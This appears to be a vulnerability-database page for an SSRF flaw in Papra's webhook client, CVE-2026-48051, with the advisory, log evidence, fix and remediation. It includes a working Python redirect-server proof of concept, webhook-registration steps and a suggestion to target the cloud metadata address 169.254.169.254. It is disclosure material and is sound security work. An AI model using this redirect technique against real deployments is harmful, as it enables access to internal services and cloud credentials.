Skip to main content

Papra CVE-2026-48051

LOW
Server-Side Request Forgery (SSRF) (CWE-918)
2026-06-10 https://github.com/papra-hq/papra GHSA-5g86-85rp-f9hx
3.5
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
3.5 LOW
AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 10, 2026 - 14:34 vuln.today
Analysis Generated
Jun 10, 2026 - 14:34 vuln.today
CVE Published
Jun 10, 2026 - 13:39 nvd
LOW 3.5

DescriptionGitHub Advisory

Summary

Papra's webhook delivery system contains an SSRF protection bypass that allows any authenticated organisation member to cause the server to make HTTP requests to internal addresses - loopback, link-local, and RFC-1918 ranges. The SSRF protection validates the registered webhook URL but ignores redirect destinations. The HTTP client (ofetch) follows 3xx responses automatically, and the redirect target is never checked against the blocklist. An attacker registers a webhook pointing to an attacker-controlled server, which redirects incoming POSTs to any internal address. Exploitation was confirmed by live test against the official Docker image. The fix is a single-line change to the webhook HTTP client.

Details

The vulnerable call

The webhook HTTP client in packages/webhooks/src/webhooks.services.ts (lines 16-19) calls ofetch.raw() without specifying a redirect option:

typescript
const response = await ofetch.raw<unknown>(url, {
  ...options,
  ignoreResponseError: true,
  // no `redirect` option - defaults to 'follow' per Fetch API spec
});

ofetch is a thin wrapper around the WHATWG Fetch API. The Fetch specification defines three redirect modes - follow, error, and manual - and sets follow as the default. In follow mode, the HTTP implementation resolves the redirect chain internally and returns only the final response; application code receives the terminal response with no indication that any redirects occurred. ofetch 1.4.1 does not set a redirect option in its internal fetch() call, so the default applies. The ignoreResponseError: true option only suppresses exceptions on non-2xx responses; it has no effect on redirect handling.

How the bypass works

The SSRF protection runs at two points: registration time (checkWebhookUrlIsSsrfSafe, webhooks.usecases.ts:34) and delivery time (filterOutSsrfUnsafeWebhooks, webhooks.usecases.ts:124). Both checks work the same way:

typescript
// apps/papra-server/src/modules/shared/ssrf/ssrf.services.ts, lines 20-27
const hostname = getUrlHostname(url);
return isHostnameSsrfSafe({ hostname, allowedHostnames, dnsLookup, logger });
// Resolves hostname → checks all resulting IPs against the blocklist
// Blocklist covers: 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16,
//                   169.254.0.0/16, ::1, and other reserved ranges

Both checks operate on url - the registered webhook URL, a public hostname that resolves to a public IP and passes the blocklist. Neither check has any visibility into where the HTTP client will end up after following a redirect. The Location header in a 3xx response is never extracted, never DNS-resolved, and never compared against the blocklist. By the time the redirect target is known to the Fetch implementation, the request has already been made.

The developer cannot observe this gap. The Fetch API gives no opportunity to inspect the redirect target before following it.

Evidence

Attacker's redirect server receives the POST and returns 302:

[2026-05-08T15:55:38.388647] POST /redirect
  User-Agent: papra-webhook-client    ← set only in webhooks.services.ts:47
  X-Forwarded-For: <REDACTED>
"POST /redirect HTTP/1.1" 302 -

Papra's inbound request log immediately after - this is the server logging a request arriving at itself:

{"message":"Request completed","timestampMs":1778255738420,
 "data":{"status":200,"method":"GET","path":"/api/health",
         "userAgent":"papra-webhook-client"}}   ← outbound UA on an inbound request

papra-webhook-client is set exclusively by the outbound webhook delivery code (webhooks.services.ts:47). Its presence on an inbound log entry is only possible if Papra's own HTTP client followed the 302 and made a request to the loopback. The delivery record confirms the internal endpoint responded HTTP 200:

{"message":"Webhook triggered","timestampMs":1778255738422,
 "data":{"responseStatus":200,"webhookId":"wbh_s6t1xzezbzbivyhptcs7qxhk"}}

PoC

  1. Start redirect_server.py on a publicly reachable server (ngrok free tier is sufficient). The example below uses Papra's own health endpoint as the redirect target to demonstrate the bypass - in a cloud environment replace REDIRECT_TARGET with http://169.254.169.254/latest/meta-data/ or any internal address.
python
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import datetime

REDIRECT_TARGET = "http://127.0.0.1:1221/api/health"
# replace with desired internal target

class RedirectHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_len = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(content_len)
        print(f"[{datetime.datetime.now(datetime.timezone.utc).isoformat()}] POST {self.path}")
        print(f"  User-Agent: {self.headers.get('User-Agent')}")
        print(f"  Body: {body[:200]}")
        self.send_response(302)
        self.send_header("Location", REDIRECT_TARGET)
        self.end_headers()

class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    pass

if __name__ == "__main__":
    server = ThreadedHTTPServer(("0.0.0.0", 9999), RedirectHandler)
    print("Redirect server running on port 9999")
    server.serve_forever()

> ThreadingMixIn is required - Papra immediately opens a second connection to the same port when following the redirect; a single-threaded server deadlocks.

  1. Register a webhook pointing to the redirect server:
   POST /api/organizations/{orgId}/webhooks
   {"name":"ssrf-test","url":"https://{ngrok-url}/redirect","events":["document:created"]}
  1. Upload any document to the organisation to fire a document:created event.
  2. Confirm on the Papra server logs that /api/health received a GET request with User-Agent: papra-webhook-client.

Impact

  • Any authenticated org member (no admin role required) can trigger the exploit.
  • The Papra server makes HTTP requests to internal addresses blocked by its own SSRF list: 127.0.0.0/8, 169.254.0.0/16, RFC-1918 ranges.
  • This is blind SSRF - internal response bodies are written to webhook_deliveries but no API route exposes delivery records. Response content is not accessible to the attacker through the Papra API.
  • Internal network topology can be partially inferred from whether requests succeed or fail (closed port produces a network error; open port returns an HTTP response).
  • HTTP 307 redirects preserve the POST method and body, enabling state-changing requests to internal services that accept unauthenticated POSTs.
  • On cloud deployments (AWS, GCP, Azure), the instance metadata service at 169.254.169.254 is reachable by the same technique. Cloud IMDS was not tested in this PoC (local Docker environment, no metadata service present). Response exfiltration via the Papra API remains unavailable regardless.

Suggested Fix

Add redirect: 'manual' to the ofetch.raw() call in packages/webhooks/src/webhooks.services.ts (line 16) and treat any 3xx response as a delivery failure. Webhook endpoints have no legitimate reason to redirect:

typescript
const response = await ofetch.raw<unknown>(url, {
  ...options,
  redirect: 'manual',       // do not follow redirects
  ignoreResponseError: true,
});

If redirect-following is ever required in the future, validate the Location header through the existing isUrlSsrfSafe() check before re-issuing the request.

AnalysisAI

Papra's webhook delivery system allows any authenticated organisation member to bypass SSRF protections and cause the server to issue HTTP requests to loopback, link-local, and RFC-1918 addresses by exploiting automatic redirect-following in the ofetch HTTP client. The SSRF blocklist is enforced on registered webhook URLs but never applied to 3xx redirect destinations, meaning an attacker-controlled server can return a 302/307 response pointing to any internal address and Papra's server will follow it. A public proof-of-concept is available and exploitation was confirmed against the official Docker image; no CISA KEV listing is present at time of analysis.

Technical ContextAI

The affected component is the npm package @papra/webhooks (CPE: pkg:npm/@papra_webhooks), which implements outbound HTTP delivery of webhook events in the Papra document-management platform. The HTTP client is ofetch 1.4.1, a thin wrapper around the WHATWG Fetch API. The Fetch specification defines three redirect modes - follow, error, and manual - and defaults to 'follow', meaning the HTTP implementation transparently resolves the full redirect chain and returns only the terminal response; application code receives no indication that any redirect occurred. The SSRF protection (CWE-918: Server-Side Request Forgery) is applied at webhook registration time via checkWebhookUrlIsSsrfSafe (webhooks.usecases.ts:34) and at delivery time via filterOutSsrfUnsafeWebhooks (webhooks.usecases.ts:124). Both guards call isHostnameSsrfSafe in ssrf.services.ts, which performs DNS resolution on the registered URL hostname and checks resulting IPs against a blocklist covering 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and ::1. Because both checks operate exclusively on the originally registered URL, the Location header returned in any 3xx response is never extracted, resolved, or compared against the blocklist before the Fetch implementation follows it. Additionally, the changeset notes that the fix also addresses a TOCTOU DNS rebinding window in the original design, where registration-time DNS resolution and delivery-time DNS resolution could diverge.

RemediationAI

Upgrade @papra/webhooks to version 0.3.3, which is confirmed as the fixed release per the GHSA advisory (https://github.com/papra-hq/papra/security/advisories/GHSA-5g86-85rp-f9hx). The patch commit 086dccbfda18c850bee50b94c48f5f110be6935c introduces two layered defences: first, redirect: 'manual' is added to the ofetch.raw() call in the new webhooks.http-client.ts, causing any 3xx response to be returned as a delivery failure rather than followed; second, a undici Agent configured with a Node.js net.BlockList is attached as the dispatcher, enforcing SSRF IP blocking at TCP connection time on every request - including any that would have bypassed DNS-level checks via rebinding. If upgrading immediately is not possible, operators can restrict outbound network access from the Papra server host to block RFC-1918 and link-local ranges at the network or firewall layer; this removes the ability to reach internal services but does not prevent the server from contacting attacker-controlled public addresses. Disabling webhook functionality entirely (if supported by configuration) eliminates the attack surface until patching is feasible.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-48051 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy